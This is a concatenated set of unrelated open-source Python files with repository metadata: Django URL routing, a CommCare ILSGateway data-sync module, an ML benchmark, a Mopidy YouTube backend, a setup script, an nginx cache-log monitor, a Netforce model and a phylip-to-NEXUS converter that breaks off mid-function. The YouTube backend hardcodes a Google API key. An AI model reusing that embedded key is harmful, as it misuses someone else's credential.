(r'^requests/', include('airmozilla.suggest.urls', namespace='suggest')),
(r'^search/', include('airmozilla.search.urls', namespace='search')),
(r'^comments/', include('airmozilla.comments.urls', namespace='comments')),
(r'^starred/', include('airmozilla.starred.urls', namespace='starred')),
(r'^surveys/', include('airmozilla.surveys.urls', namespace='surveys')),
(r'^uploads/', include('airmozilla.uploads.urls', namespace='uploads')),
(r'^roku/', include('airmozilla.roku.urls', namespace='roku')),
(r'^popcorn/', include('airmozilla.popcorn.urls', namespace='popcorn')),
(r'^new/', include('airmozilla.new.urls', namespace='new')),
('^(?P<path>favicon\.ico)$', 'django.views.static.serve',
{'document_root': settings.ROOT + '/airmozilla/base/static/img'}),
(r'', include('django_browserid.urls')),
(r'', include('airmozilla.main.urls', namespace='main')),
('^pages/', include('airmozilla.staticpages.urls',
namespace='staticpages')),
)
# In DEBUG mode, serve media files through Django.
if settings.DEBUG: # pragma: no cover
# Remove leading and trailing slashes so the regex matches.
media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
urlpatterns += patterns(
'',
(r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve', {
'document_root': settings.MEDIA_ROOT
}),
)
urlpatterns += staticfiles_urlpatterns()
djcelery.setup_loader()
| bsd-3-clause | -1,065,121,520,599,024,900 | 37.411765 | 79 | 0.665646 | false |
SEL-Columbia/commcare-hq | custom/ilsgateway/commtrack.py | 1 | 12744 | import logging
import traceback
from django.contrib.auth.models import User
from corehq.apps.locations.models import Location
from corehq.apps.sms.mixin import PhoneNumberInUseException, VerifiedNumber
from corehq.apps.users.models import WebUser, CommCareUser, CouchUser, UserRole
from custom.api.utils import apply_updates
from custom.ilsgateway.api import ILSGatewayEndpoint
from corehq.apps.commtrack.models import Product, LocationType, SupplyPointCase, CommTrackUser, CommtrackConfig, \
CommtrackActionConfig
from dimagi.utils.dates import force_to_datetime
from custom.ilsgateway.models import MigrationCheckpoint
from requests.exceptions import ConnectionError
from datetime import datetime
from custom.ilsgateway.api import Location as Loc
def retry(retry_max):
    """Decorator that retries the wrapped function up to retry_max times, logging each failure;
    returns None if every attempt raises."""
    def wrap(f):
def wrapped_f(*args, **kwargs):
retry_count = 0
fail = False
result = None
while retry_count < retry_max:
try:
result = f(*args, **kwargs)
fail = False
break
except Exception:
retry_count += 1
fail = True
logging.error('%d/%d tries failed' % (retry_count, retry_max))
logging.error(traceback.format_exc())
if fail:
logging.error(f.__name__ + ": number of tries exceeds limit")
logging.error("args: %s, kwargs: %s" % (args, kwargs))
return result
return wrapped_f
return wrap
@retry(5)
def sync_ilsgateway_product(domain, ilsgateway_product):
product = Product.get_by_code(domain, ilsgateway_product.sms_code)
product_dict = {
'domain': domain,
'name': ilsgateway_product.name,
'code': ilsgateway_product.sms_code,
'unit': str(ilsgateway_product.units),
'description': ilsgateway_product.description,
}
if product is None:
product = Product(**product_dict)
product.save()
else:
if apply_updates(product, product_dict):
product.save()
return product
@retry(5)
def sync_ilsgateway_webuser(domain, ilsgateway_webuser):
user = WebUser.get_by_username(ilsgateway_webuser.email.lower())
user_dict = {
'first_name': ilsgateway_webuser.first_name,
'last_name': ilsgateway_webuser.last_name,
'is_staff': ilsgateway_webuser.is_staff,
'is_active': ilsgateway_webuser.is_active,
'is_superuser': ilsgateway_webuser.is_superuser,
'last_login': force_to_datetime(ilsgateway_webuser.last_login),
'date_joined': force_to_datetime(ilsgateway_webuser.date_joined),
'password_hashed': True,
}
sp = SupplyPointCase.view('hqcase/by_domain_external_id',
key=[domain, str(ilsgateway_webuser.location)],
reduce=False,
include_docs=True,
limit=1).first()
role_id = ilsgateway_webuser.role_id if hasattr(ilsgateway_webuser, 'role_id') else None
location_id = sp.location_id if sp else None
if user is None:
try:
user = WebUser.create(domain=None, username=ilsgateway_webuser.email.lower(),
password=ilsgateway_webuser.password, email=ilsgateway_webuser.email, **user_dict)
user.add_domain_membership(domain, role_id=role_id, location_id=location_id)
user.save()
except Exception as e:
logging.error(e)
else:
if domain not in user.get_domains():
user.add_domain_membership(domain, role_id=role_id, location_id=location_id)
user.save()
return user
def add_location(user, location_id):
commtrack_user = CommTrackUser.wrap(user.to_json())
if location_id:
loc = Location.get(location_id)
commtrack_user.clear_locations()
commtrack_user.add_location(loc, create_sp_if_missing=True)
@retry(5)
def sync_ilsgateway_smsuser(domain, ilsgateway_smsuser):
username_part = "%s%d" % (ilsgateway_smsuser.name.strip().replace(' ', '.').lower(), ilsgateway_smsuser.id)
username = "%s@%s.commcarehq.org" % (username_part, domain)
user = CouchUser.get_by_username(username)
splitted_value = ilsgateway_smsuser.name.split(' ', 1)
first_name = last_name = ''
if splitted_value:
first_name = splitted_value[0][:30]
last_name = splitted_value[1][:30] if len(splitted_value) > 1 else ''
user_dict = {
'first_name': first_name,
'last_name': last_name,
'is_active': bool(ilsgateway_smsuser.is_active),
'email': ilsgateway_smsuser.email,
'user_data': {
"role": ilsgateway_smsuser.role
}
}
if ilsgateway_smsuser.phone_numbers:
user_dict['phone_numbers'] = [ilsgateway_smsuser.phone_numbers[0].replace('+', '')]
user_dict['user_data']['backend'] = ilsgateway_smsuser.backend
sp = SupplyPointCase.view('hqcase/by_domain_external_id',
key=[domain, str(ilsgateway_smsuser.supply_point)],
reduce=False,
include_docs=True,
limit=1).first()
location_id = sp.location_id if sp else None
if user is None and username_part:
try:
password = User.objects.make_random_password()
user = CommCareUser.create(domain=domain, username=username, password=password,
email=ilsgateway_smsuser.email, commit=False)
user.first_name = first_name
user.last_name = last_name
user.is_active = bool(ilsgateway_smsuser.is_active)
user.user_data = user_dict["user_data"]
if "phone_numbers" in user_dict:
user.set_default_phone_number(user_dict["phone_numbers"][0])
try:
user.save_verified_number(domain, user_dict["phone_numbers"][0], True, ilsgateway_smsuser.backend)
except PhoneNumberInUseException as e:
v = VerifiedNumber.by_phone(user_dict["phone_numbers"][0], include_pending=True)
v.delete()
user.save_verified_number(domain, user_dict["phone_numbers"][0], True, ilsgateway_smsuser.backend)
dm = user.get_domain_membership(domain)
dm.location_id = location_id
user.save()
add_location(user, location_id)
except Exception as e:
logging.error(e)
else:
dm = user.get_domain_membership(domain)
current_location_id = dm.location_id if dm else None
save = False
if current_location_id != location_id:
dm.location_id = location_id
add_location(user, location_id)
save = True
if apply_updates(user, user_dict) or save:
user.save()
return user
@retry(5)
def sync_ilsgateway_location(domain, endpoint, ilsgateway_location):
location = Location.view('commtrack/locations_by_code',
key=[domain, ilsgateway_location.code.lower()],
include_docs=True).first()
if not location:
if ilsgateway_location.parent:
loc_parent = SupplyPointCase.view('hqcase/by_domain_external_id',
key=[domain, str(ilsgateway_location.parent)],
reduce=False,
include_docs=True).first()
if not loc_parent:
parent = endpoint.get_location(ilsgateway_location.parent)
loc_parent = sync_ilsgateway_location(domain, endpoint, Loc.from_json(parent))
else:
loc_parent = loc_parent.location
location = Location(parent=loc_parent)
else:
location = Location()
location.lineage = []
location.domain = domain
location.name = ilsgateway_location.name
location.metadata = {'groups': ilsgateway_location.groups}
if ilsgateway_location.latitude:
location.latitude = float(ilsgateway_location.latitude)
if ilsgateway_location.longitude:
location.longitude = float(ilsgateway_location.longitude)
location.location_type = ilsgateway_location.type
location.site_code = ilsgateway_location.code
location.external_id = str(ilsgateway_location.id)
location.save()
if not SupplyPointCase.get_by_location(location):
SupplyPointCase.create_from_location(domain, location)
else:
location_dict = {
'name': ilsgateway_location.name,
'latitude': float(ilsgateway_location.latitude) if ilsgateway_location.latitude else None,
'longitude': float(ilsgateway_location.longitude) if ilsgateway_location.longitude else None,
'type': ilsgateway_location.type,
'site_code': ilsgateway_location.code.lower(),
'external_id': str(ilsgateway_location.id),
}
case = SupplyPointCase.get_by_location(location)
if apply_updates(location, location_dict):
location.save()
if case:
case.update_from_location(location)
else:
SupplyPointCase.create_from_location(domain, location)
return location
def products_sync(domain, endpoint, **kwargs):
for product in endpoint.get_products(**kwargs):
sync_ilsgateway_product(domain, product)
def webusers_sync(project, endpoint, **kwargs):
for user in endpoint.get_webusers(**kwargs):
if user.email:
if not user.is_superuser:
setattr(user, 'role_id', UserRole.get_read_only_role_by_domain(project).get_id)
sync_ilsgateway_webuser(project, user)
def smsusers_sync(project, endpoint, **kwargs):
has_next = True
next_url = None
while has_next:
next_url_params = next_url.split('?')[1] if next_url else None
meta, users = endpoint.get_smsusers(next_url_params=next_url_params, **kwargs)
for user in users:
sync_ilsgateway_smsuser(project, user)
if not meta.get('next', False):
has_next = False
else:
next_url = meta['next']
def locations_sync(project, endpoint, **kwargs):
for location_type in ['facility', 'district', 'region']:
has_next = True
next_url = None
while has_next:
next_url_params = next_url.split('?')[1] if next_url else None
meta, locations = endpoint.get_locations(type=location_type, next_url_params=next_url_params, **kwargs)
for location in locations:
sync_ilsgateway_location(project, endpoint, location)
if not meta.get('next', False):
has_next = False
else:
next_url = meta['next']
def commtrack_settings_sync(project):
locations_types = ["MOHSW", "REGION", "DISTRICT", "FACILITY"]
config = CommtrackConfig.for_domain(project)
config.location_types = []
for i, value in enumerate(locations_types):
if not any(lt.name == value
for lt in config.location_types):
allowed_parents = [locations_types[i - 1]] if i > 0 else [""]
config.location_types.append(
LocationType(name=value, allowed_parents=allowed_parents, administrative=(value != 'FACILITY')))
actions = [action.keyword for action in config.actions]
if 'delivered' not in actions:
config.actions.append(
CommtrackActionConfig(
action='receipts',
keyword='delivered',
caption='Delivered')
)
config.save()
def bootstrap_domain(ilsgateway_config):
domain = ilsgateway_config.domain
start_date = datetime.today()
endpoint = ILSGatewayEndpoint.from_config(ilsgateway_config)
try:
checkpoint = MigrationCheckpoint.objects.get(domain=domain)
date = checkpoint.date
except MigrationCheckpoint.DoesNotExist:
checkpoint = MigrationCheckpoint()
checkpoint.domain = domain
date = None
commtrack_settings_sync(domain)
try:
products_sync(domain, endpoint, date=date)
locations_sync(domain, endpoint, date=date)
webusers_sync(domain, endpoint, date=date)
smsusers_sync(domain, endpoint, date=date)
checkpoint.date = start_date
checkpoint.save()
except ConnectionError as e:
logging.error(e) | bsd-3-clause | 4,437,364,392,095,602,000 | 39.332278 | 118 | 0.605148 | false |
arthurmensch/modl | benchmarks/log.py | 1 | 2179 | import time
import numpy as np
from lightning.impl.primal_cd import CDClassifier
from lightning.impl.sag import SAGAClassifier
from sklearn.datasets import fetch_20newsgroups_vectorized
from lightning.classification import SAGClassifier
from sklearn.linear_model import LogisticRegression
bunch = fetch_20newsgroups_vectorized(subset="all")
X = bunch.data
y = bunch.target
y[y >= 1] = 1
alpha = 1e-3
n_samples = X.shape[0]
sag = SAGClassifier(eta='auto',
loss='log',
alpha=alpha,
tol=1e-10,
max_iter=1000,
verbose=1,
random_state=0)
saga = SAGAClassifier(eta='auto',
loss='log',
alpha=alpha,
tol=1e-10,
max_iter=1000,
verbose=1,
random_state=0)
cd_classifier = CDClassifier(loss='log',
alpha=alpha / 2,
C=1 / n_samples,
tol=1e-10,
max_iter=100,
verbose=1,
random_state=0)
sklearn_sag = LogisticRegression(tol=1e-10, max_iter=1000,
verbose=2, random_state=0,
C=1. / (n_samples * alpha),
solver='sag',
penalty='l2',
fit_intercept=False)
classifiers = [{'name': 'Lightning SAG', 'estimator': sag},
{'name': 'Lightning SAGA', 'estimator': saga},
{'name': 'Sklearn SAG', 'estimator': sklearn_sag},
{'name': 'Lightning CD', 'estimator': cd_classifier},
]
for classifier in classifiers:
    print(classifier['name'])
    clf = classifier['estimator']
    start = time.time()  # time each classifier separately
    clf.fit(X, y)
    print("Training time", time.time() - start)
print("Accuracy", np.mean(clf.predict(X) == y))
n_nz = np.sum(np.sum(clf.coef_ != 0, axis=0, dtype=bool))
n_nz /= clf.coef_.size
print(clf.coef_)
print('Non-zero', n_nz)
| bsd-2-clause | 7,691,973,709,971,517,000 | 33.046875 | 68 | 0.490133 | false |
chatziko/mopidy-youtube | mopidy_youtube/backend.py | 1 | 5534 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import string
from multiprocessing.pool import ThreadPool
from urlparse import urlparse, parse_qs
import unicodedata
import pafy
from mopidy import backend
from mopidy.models import SearchResult, Track, Album
import pykka
import requests
from mopidy_youtube import logger
yt_api_endpoint = 'https://www.googleapis.com/youtube/v3/'
yt_key = 'AIzaSyAl1Xq9DwdE_KD4AtPaE4EJl3WZe2zCqg4'
session = requests.Session()
def resolve_track(track, stream=False):
logger.debug("Resolving Youtube for track '%s'", track)
if hasattr(track, 'uri'):
return resolve_url(track.comment, stream)
else:
return resolve_url(track.split('.')[-1], stream)
def safe_url(uri):
valid_chars = "-_.() %s%s" % (string.ascii_letters, string.digits)
safe_uri = unicodedata.normalize(
'NFKD',
unicode(uri)
).encode('ASCII', 'ignore')
return re.sub(
        r'\s+',
' ',
''.join(c for c in safe_uri if c in valid_chars)
).strip()
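# Illustrative sketch (not part of the original module): safe_url() keeps only the
# whitelisted characters and collapses runs of whitespace. The video title below is
# a made-up example.
def _example_safe_url():
    # '/' is not in valid_chars, so it is dropped:
    return safe_url("AC/DC - Thunderstruck (Official)")  # "ACDC - Thunderstruck (Official)"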
def resolve_url(url, stream=False):
try:
video = pafy.new(url)
if not stream:
uri = 'youtube:video/%s.%s' % (
safe_url(video.title), video.videoid
)
else:
uri = video.getbestaudio()
if not uri: # get video url
uri = video.getbest()
logger.debug('%s - %s %s %s' % (
video.title, uri.bitrate, uri.mediatype, uri.extension))
uri = uri.url
if not uri:
return
except Exception as e:
# Video is private or doesn't exist
logger.info(e.message)
return
track = Track(
name=video.title,
comment=video.videoid,
length=video.length * 1000,
album=Album(
name='Youtube',
images=[video.bigthumb, video.bigthumbhd]
),
uri=uri
)
return track
def search_youtube(q):
query = {
'part': 'id',
'maxResults': 15,
'type': 'video',
'q': q,
'key': yt_key
}
result = session.get(yt_api_endpoint+'search', params=query)
data = result.json()
resolve_pool = ThreadPool(processes=16)
playlist = [item['id']['videoId'] for item in data['items']]
playlist = resolve_pool.map(resolve_url, playlist)
resolve_pool.close()
return [item for item in playlist if item]
def resolve_playlist(url):
resolve_pool = ThreadPool(processes=16)
logger.info("Resolving Youtube-Playlist '%s'", url)
playlist = []
page = 'first'
while page:
params = {
'playlistId': url,
'maxResults': 50,
'key': yt_key,
'part': 'contentDetails'
}
if page and page != "first":
logger.debug("Get Youtube-Playlist '%s' page %s", url, page)
params['pageToken'] = page
result = session.get(yt_api_endpoint+'playlistItems', params=params)
data = result.json()
page = data.get('nextPageToken')
for item in data["items"]:
video_id = item['contentDetails']['videoId']
playlist.append(video_id)
playlist = resolve_pool.map(resolve_url, playlist)
resolve_pool.close()
return [item for item in playlist if item]
class YoutubeBackend(pykka.ThreadingActor, backend.Backend):
def __init__(self, config, audio):
super(YoutubeBackend, self).__init__()
self.config = config
self.library = YoutubeLibraryProvider(backend=self)
self.playback = YoutubePlaybackProvider(audio=audio, backend=self)
self.uri_schemes = ['youtube', 'yt']
class YoutubeLibraryProvider(backend.LibraryProvider):
def lookup(self, track):
if 'yt:' in track:
track = track.replace('yt:', '')
if 'youtube.com' in track:
url = urlparse(track)
req = parse_qs(url.query)
if 'list' in req:
return resolve_playlist(req.get('list')[0])
else:
return [resolve_url(track)]
else:
return [resolve_url(track)]
def search(self, query=None, uris=None, exact=False):
# TODO Support exact search
if not query:
return
if 'uri' in query:
search_query = ''.join(query['uri'])
url = urlparse(search_query)
if 'youtube.com' in url.netloc:
req = parse_qs(url.query)
if 'list' in req:
return SearchResult(
uri='youtube:search',
tracks=resolve_playlist(req.get('list')[0])
)
else:
logger.info(
"Resolving Youtube for track '%s'", search_query)
return SearchResult(
uri='youtube:search',
tracks=[resolve_url(search_query)]
)
else:
search_query = ' '.join(query.values()[0])
logger.info("Searching Youtube for query '%s'", search_query)
return SearchResult(
uri='youtube:search',
tracks=search_youtube(search_query)
)
class YoutubePlaybackProvider(backend.PlaybackProvider):
def translate_uri(self, uri):
track = resolve_track(uri, True)
if track is not None:
return track.uri
else:
return None
| apache-2.0 | 1,411,562,814,534,946,800 | 27.822917 | 76 | 0.555114 | false |
DucQuang1/py-earth | setup.py | 1 | 3348 | from setuptools import setup, Extension
import numpy
import sys
import os
sys.path.insert(0, os.path.join('.', 'pyearth'))
from _version import __version__
# Determine whether to use Cython
if '--cythonize' in sys.argv:
cythonize_switch = True
del sys.argv[sys.argv.index('--cythonize')]
else:
cythonize_switch = False
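# Illustrative note (not part of the original script): because the custom flag is
# removed from sys.argv before setup() runs, a Cython build can be requested with
# any normal setup command, for example (assuming Cython is installed):
#
#     python setup.py build_ext --inplace --cythonize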
# Find all includes
local_inc = 'pyearth'
numpy_inc = numpy.get_include()
# Set up the ext_modules for Cython or not, depending
if cythonize_switch:
from Cython.Distutils import build_ext
from Cython.Build import cythonize
ext_modules = cythonize(
[Extension(
"pyearth._util", ["pyearth/_util.pyx"], include_dirs=[numpy_inc]),
Extension(
"pyearth._basis",
["pyearth/_basis.pyx"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._record",
["pyearth/_record.pyx"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._pruning",
["pyearth/_pruning.pyx"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._forward",
["pyearth/_forward.pyx"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._types",
["pyearth/_types.pyx"],
include_dirs=[local_inc,
numpy_inc])
])
else:
ext_modules = [Extension(
"pyearth._util", ["pyearth/_util.c"], include_dirs=[numpy_inc]),
Extension(
"pyearth._basis",
["pyearth/_basis.c"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._record",
["pyearth/_record.c"],
include_dirs=[numpy_inc]),
Extension(
"pyearth._pruning",
["pyearth/_pruning.c"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._forward",
["pyearth/_forward.c"],
include_dirs=[local_inc,
numpy_inc]),
Extension(
"pyearth._types",
["pyearth/_types.c"],
include_dirs=[local_inc,
numpy_inc])
]
# Create a dictionary of arguments for setup
setup_args = {'name': 'py-earth',
'version': __version__,
'author': 'Jason Rudy',
'author_email': '[email protected]',
'packages': ['pyearth', 'pyearth.test',
'pyearth.test.basis', 'pyearth.test.record'],
'license': 'LICENSE.txt',
'description':
'A Python implementation of Jerome Friedman\'s MARS algorithm.',
'long_description': open('README.md', 'r').read(),
'py_modules': ['pyearth.earth', 'pyearth._version'],
'ext_modules': ext_modules,
'classifiers': ['Development Status :: 3 - Alpha'],
'requires': ['numpy', 'scipy'],
'install_requires': ['scikit-learn >= 0.16',
'sphinx_gallery']}
# Add the build_ext command only if cythonizing
if cythonize_switch:
setup_args['cmdclass'] = {'build_ext': build_ext}
# Finally
setup(**setup_args)
| bsd-3-clause | -5,795,489,001,214,014,000 | 32.148515 | 78 | 0.506272 | false |
biddellns/sc2league-server | config/urls.py | 1 | 1043 | """sc2league URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework import routers
from sc2league_server.seasons import views as season_views
router = routers.DefaultRouter()
router.register('seasons', season_views.SeasonViewSet)
urlpatterns = [
url('^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
| gpl-3.0 | -8,316,606,483,788,474,000 | 32.645161 | 82 | 0.71908 | false |
concurrentlabs/laguna | 1.0/scripts/cachequery/cache_query.py | 1 | 2571 | #!/usr/bin/python
import io
import os
import signal
import sys
from subprocess import call
hit = miss = bypass = expired = 0
#########################################################################################
#########################################################################################
def main():
try:
s = '/var/log/nginx/cache.log'
istream = io.open(s, 'r')
except IOError:
print 'ERROR: failed to open %s' % s
exit(-1)
try:
open("/var/run/cache_query.pid","wb").write('%d' % os.getpid())
except IOError:
        print 'ERROR: failed to open /var/run/cache_query.pid'
exit(-1)
signal.signal(signal.SIGINT, reset_stats)
global hit, miss, bypass, expired
istream.seek(0, 2)
banner()
print_stat_line()
while 1:
for s in istream.readlines():
l = s.split(' ')
if l[2] == 'HIT':
hit += 1
print_stat_line()
elif l[2] == 'MISS':
miss += 1
print_stat_line()
elif l[2] == 'BYPASS':
bypass += 1
print_stat_line()
elif l[2] == 'EXPIRED':
expired += 1
print_stat_line()
### ??? ###
# expired = 0
exit(0)
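#########################################################################################
# Illustrative note (not part of the original script): main() assumes the third
# whitespace-separated field of each line in /var/log/nginx/cache.log is the
# upstream cache status (HIT, MISS, BYPASS or EXPIRED), e.g. an nginx log_format
# along the lines of '$remote_addr - $upstream_cache_status ...' (hypothetical).
#########################################################################################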
#########################################################################################
# reset stats
#########################################################################################
def reset_stats(sig, stack):
# print "reset_stats fired."
global hit, miss, bypass, expired
hit = miss = bypass = expired = 0
banner()
print_stat_line()
return
#########################################################################################
#########################################################################################
def banner():
call(["clear"])
print '\n Cache Statistics\n ================\n'
return
#########################################################################################
#########################################################################################
def print_stat_line():
global hit, miss, bypass, expired
sys.stdout.write(' HIT: %5d MISS: %5d BYPASS: %5d EXPIRED: %5d\n'
% (hit, miss, bypass, expired))
return
#########################################################################################
#########################################################################################
if __name__ == "__main__":
main()
| apache-2.0 | -3,529,379,872,526,363,000 | 30.353659 | 89 | 0.318164 | false |
bank-netforce/netforce | netforce_general/netforce_general/models/user_group.py | 1 | 1497 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields
class Group(Model):
_name = "user.group"
_string = "Group"
_key = ["name"]
_fields = {
"name": fields.Char("Group Name", required=True, search=True),
"users": fields.Many2Many("base.user", "Users"),
"comments": fields.One2Many("message", "related_id", "Comments"),
}
_order = "name"
Group.register()
| mit | 9,020,449,533,256,077,000 | 41.771429 | 80 | 0.727455 | false |
tkchafin/scripts | phylip2biNumNex.py | 1 | 8129 | #!/usr/bin/python
import re
import sys
import os
import getopt
import operator
import random
def main():
params = parseArgs()
if params.phylip:
#Get sequences as dict of lists
seqs = readPhylip(params.phylip)
#get list of columns and list of samplenames
alen = getSeqLen(seqs)
columns = [[]for i in range(alen)]
names = list()
for key, value in seqs.items():
names.append(key)
for i, nuc in enumerate(value):
columns[i].append(nuc)
#For each column, delete those which are not bi-allelic
dels=list()
for i, col in enumerate(columns):
if not isBiallelic(col):
dels.append(i)
#print(i,"not biallelic:",col)
print("Deleting",len(dels),"non-biallelic columns.")
for col in sorted(dels,reverse=True): #reverse sorted so subsequent deletes aren't thrown off
#print(col,":",columns[col])
del columns[col]
#Then, convert to 012 format
print("Converting to 012 format...")
formatted = [[]for i in range(alen-len(dels))]
for i, col in enumerate(columns):
#print(col)
#print(nucs2numeric(col))
if params.nohet:
formatted[i] = nucs2numericNohet(col)
else:
formatted[i] = nucs2numeric(col)
#sys.exit()
final_data = dict()
for i, samp in enumerate(names):
seqs = list()
for k,nuc in enumerate(formatted):
seqs.append(nuc[i])
final_data[samp] = "".join(seqs)
print("Writing NEXUS output file...")
dict2nexus(params.out, final_data)
else:
print("No input provided.")
sys.exit(1)
#Function takes biallelic list of nucleotides and converts to numeric
#0 = major allele
#1 = minor allele
#2 = het
#? = - or N
def nucs2numeric(nucs):
if isBiallelic(nucs):
#print(nucs)
ret = list()
counts = {"A":0, "G":0, "C":0, "T":0}
#find major allele
for nuc in nucs:
if nuc not in ("-", "N"):
for exp in get_iupac_caseless(nuc):
counts[exp] += 1
#sort dict, to list of tuples (b/c dicts are orderless, can't keep as dict)
sorted_x = sorted(counts.items(), key=operator.itemgetter(1), reverse=True)
majA = sorted_x[0][0]
minA = sorted_x[1][0]
het = reverse_iupac(''.join(sorted(set([majA, minA])))) #get het code
#print(majA, minA, het)
for nuc in nucs:
nuc = nuc.upper()
if nuc == majA:
ret.append("0")
elif nuc == minA:
ret.append("1")
elif nuc == het:
ret.append("2")
elif nuc == "-":
ret.append("-")
else:
ret.append("?")
return(ret)
else:
print("Warning: Data is not biallelic:",nucs)
return(None)
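#Illustrative sketch (not part of the original script): expected behaviour of
#nucs2numeric() on a small biallelic column, where 'R' is the A/G ambiguity code
#and 'N' is treated as missing data.
def _example_nucs2numeric():
	column = ["A", "A", "G", "R", "N", "A"]
	return nucs2numeric(column) #-> ['0', '0', '1', '2', '?', '0']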
#Function takes biallelic list of nucleotides and converts to numeric
#0 = major allele
#1 = minor allele
#2 = het (randomly sampled as 0 or 1, so no "2" appears in the output)
def nucs2numericNohet(nucs):
if isBiallelic(nucs):
#print(nucs)
ret = list()
counts = {"A":0, "G":0, "C":0, "T":0}
#find major allele
for nuc in nucs:
if nuc not in ("-", "N"):
for exp in get_iupac_caseless(nuc):
counts[exp] += 1
#sort dict, to list of tuples (b/c dicts are orderless, can't keep as dict)
sorted_x = sorted(counts.items(), key=operator.itemgetter(1), reverse=True)
majA = sorted_x[0][0]
minA = sorted_x[1][0]
het = reverse_iupac(''.join(sorted(set([majA, minA])))) #get het code
#print(majA, minA, het)
for nuc in nucs:
nuc = nuc.upper()
if nuc == majA:
ret.append("0")
elif nuc == minA:
ret.append("1")
elif nuc == het:
				ret.append(str(random.randint(0,1)))
elif nuc == "-":
ret.append("-")
else:
ret.append("?")
return(ret)
else:
print("Warning: Data is not biallelic:",nucs)
return(None)
#Function to translate a string of bases to an iupac ambiguity code
def reverse_iupac(char):
char = char.upper()
iupac = {
'A':'A',
'N':'N',
'-':'-',
'C':'C',
'G':'G',
'T':'T',
'AG':'R',
'CT':'Y',
'AC':'M',
'GT':'K',
'AT':'W',
'CG':'S',
'CGT':'B',
'AGT':'D',
'ACT':'H',
'ACG':'V',
'ACGT':'N'
}
return iupac[char]
#Function takes a list of nucleotides, and returns True if the column is biallelic
#ignores gaps and Ns
#expands uipac codes using a call to external function
def isBiallelic(nucs):
expanded = list()
for nuc in nucs:
if nuc not in ("-", "N"):
for exp in get_iupac_caseless(nuc):
expanded.append(exp)
uniq_sort = sorted(set(expanded))
if len(uniq_sort) != 2:
#print(nucs)
#print(uniq_sort, len(uniq_sort))
return(False)
else:
return(True)
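#Illustrative sketch (not part of the original script): isBiallelic() expands IUPAC
#codes and ignores gaps and Ns before counting the distinct alleles in a column.
def _example_isBiallelic():
	print(isBiallelic(["A", "G", "R", "N", "-"])) #True: only A and G observed
	print(isBiallelic(["A", "C", "T"])) #False: three alleles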
#Function to split character to IUPAC codes, assuing diploidy
def get_iupac_caseless(char):
if char.islower():
char = char.upper()
iupac = {
"A" : ["A"],
"G" : ["G"],
"C" : ["C"],
"T" : ["T"],
"N" : ["A", "C", "G", "T"],
"-" : ["-"],
"R" : ["A","G"],
"Y" : ["C","T"],
"S" : ["G","C"],
"W" : ["A","T"],
"K" : ["G","T"],
"M" : ["A","C"],
"B" : ["C","G","T"],
"D" : ["A","G","T"],
"H" : ["A","C","T"],
"V" : ["A","C","G"]
}
ret = iupac[char]
return ret
#Function to read a phylip file. Returns dict (key=sample) of lists (sequences divided by site)
def readPhylip(phy):
if os.path.exists(phy):
with open(phy, 'r') as fh:
try:
num=0
ret = dict()
for line in fh:
line = line.strip()
if not line:
continue
num += 1
if num == 1:
continue
arr = line.split()
ret[arr[0]] = list(arr[1])
return(ret)
except IOError:
print("Could not read file ",fas)
sys.exit(1)
finally:
fh.close()
else:
		raise FileNotFoundError("File %s not found!"%phy)
#Function to write an alignment as DICT to NEXUS
def dict2nexus(nex, aln):
with open(nex, 'w') as fh:
try:
slen = getSeqLen(aln)
header = "#NEXUS\n\nBegin data;\nDimensions ntax=" + str(len(aln)) + " nchar=" + str(slen) + ";\n"
header = header + "Format datatype=dna symbols=\"012\" missing=? gap=-;\nMatrix\n\n"
fh.write(header)
for seq in aln:
sline = str(seq) + " " + aln[seq] + "\n"
fh.write(sline)
last = ";\nEnd;\n"
fh.write(last)
except IOError:
print("Could not read file ",nex)
sys.exit(1)
finally:
fh.close()
#Goes through a dict of sequences and get the alignment length
def getSeqLen(aln):
length = None
for key in aln:
if not length:
length = len(aln[key])
else:
if length != len(aln[key]):
print("getSeqLen: Alignment contains sequences of multiple lengths.")
return(length)
#Object to parse command-line arguments
class parseArgs():
def __init__(self):
#Define options
try:
options, remainder = getopt.getopt(sys.argv[1:], 'p:ho:n', \
["phylip=","phy=","out=","nohet"])
except getopt.GetoptError as err:
print(err)
self.display_help("\nExiting because getopt returned non-zero exit status.")
#Default values for params
#Input params
self.phylip=None
self.out="out.nex"
self.nohet=False
#First pass to see if help menu was called
for o, a in options:
if o in ("-h", "-help", "--help"):
self.display_help("Exiting because help menu was called.")
#Second pass to set all args.
for opt, arg_raw in options:
